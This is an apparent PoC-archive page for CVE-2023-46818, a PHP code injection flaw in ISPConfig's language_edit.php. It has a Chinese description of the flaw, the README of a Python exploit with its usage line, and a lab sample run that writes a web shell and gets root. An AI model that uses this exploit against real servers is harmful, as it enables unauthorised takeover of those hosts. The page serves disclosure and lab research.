关联漏洞
标题:
ISPConfig 安全漏洞
(CVE-2023-46818)
描述:ISPConfig是一套基于Linux的开源主机控制面板,它可通过Web控制面板管理多台服务器、开设网站、监控服务器运行状况等。 ISPConfig 3.2.11p1 之前版本存在安全漏洞,该漏洞源于如果启用了 admin_allow_langedit,管理员可以在语言文件编辑器中实现 PHP 代码注入。
描述
CVE-2023-46818 Python3 Exploit for ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
介绍
# CVE-2023-46818 Python Exploit
## 🔥 Description
This Python exploit script targets a security vulnerability in ISPConfig's `records` POST parameter to `/admin/language_edit.php`, which is not properly sanitized. This allows an authenticated admin to inject and execute arbitrary PHP code.
## ⚠️ Affected Versions
Version 3.2.11 and prior versions.
## ⚙️ Usage
```python
python3 CVE-2023-46818.py <URL> <Username> <Password>
```
## 💻 Sample Run
```shell
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...
ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)
ispconfig-shell#
```
## ℹ️ Reference
https://seclists.org/fulldisclosure/2023/Dec/2
## ❤️ Credits
Shout out to Egidio Romano for this discovery.
文件快照
[4.0K] /data/pocs/6aa21ca57ca3a6b82dde5540197973f4c077223f
├── [3.6K] CVE-2023-46818.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。